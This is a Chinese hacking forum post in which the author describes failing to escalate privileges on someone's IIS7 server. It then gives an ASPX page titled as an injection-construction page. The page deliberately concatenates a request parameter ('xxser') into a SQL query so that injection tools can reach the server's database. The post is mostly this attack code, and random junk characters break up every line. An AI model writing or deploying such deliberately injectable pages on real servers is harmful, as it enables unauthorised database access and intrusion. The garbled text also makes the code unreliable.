昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。+ f* Z% x! Z+ g, R' G/ X' N* ]6 C
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
: @* }: r( G- f) V* }8 I* H代码量不多,自己写个拉倒了。烦死了。
) K$ x2 n; B) |. P! S: q. l6 g' @- o% g- O/ @! h7 N. F
' i0 P/ O7 a4 q: V
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"># l3 U0 ?+ Y' x) W( K+ \
<html xmlns="http://www.w3.org/1999/xhtml">" q5 }9 I. `5 c7 a. W# g4 R% ]" U
<head runat="server">6 x* P- H7 r. R- o \3 J
<title>暗影aspx构造注射专用页面</title>
( ^: q# O# o V" E</head>" y. F( d$ S6 `( t
<body>
7 A' i0 i& P4 W8 J <form id="form1" runat="server">
8 t4 O& Q$ R2 \; I <div>) Z/ t# p, p: C# Y
<script language="c#" runat="server">
; t8 a; f) D8 _( f & F5 y) A2 ~+ F: |# a% Q' Y' z S5 {
void page_init(object sender, EventArgs e)
7 p; Y4 s1 f ~& m {
1 _& T2 K' |: D) O, _; B
$ V2 A5 O; B, E) t, k: f+ J" E System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
- x* y9 ^, x4 v9 @
- e0 q4 w* W# u conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
0 E5 G4 k; h9 E' p+ T2 B conn.Open();6 C# ?- E6 r: ]5 B, i9 ^
6 n) A4 s4 T1 s% `8 r. P* ] string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
0 @& Q0 S: i# }0 h 9 }6 W3 m+ G$ l: G+ V$ b2 O
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
! O% F. \$ D' L3 x$ }6 d int x = command.ExecuteNonQuery();. V7 `) B9 h! W& c4 ?/ O
Response.Write(i+"\n");4 a7 q# U1 ], e7 @& f9 n+ }
Response.Write(x);+ p H7 d- [$ A% k
conn.Close();
; c, r; C$ Z3 l/ l$ } }
+ Z/ W ^) Y+ K( s5 P ` 2 n% F" V# |0 K3 y+ E0 \* ~
</script>$ I. g1 \& M" p
</div>2 y5 T' c0 y0 d$ U0 ~# ?
</form>
, D7 w0 W+ B7 B0 P" Y</body>3 g" c$ r4 t) p" d
</html>. i% B1 B' }0 m: V
|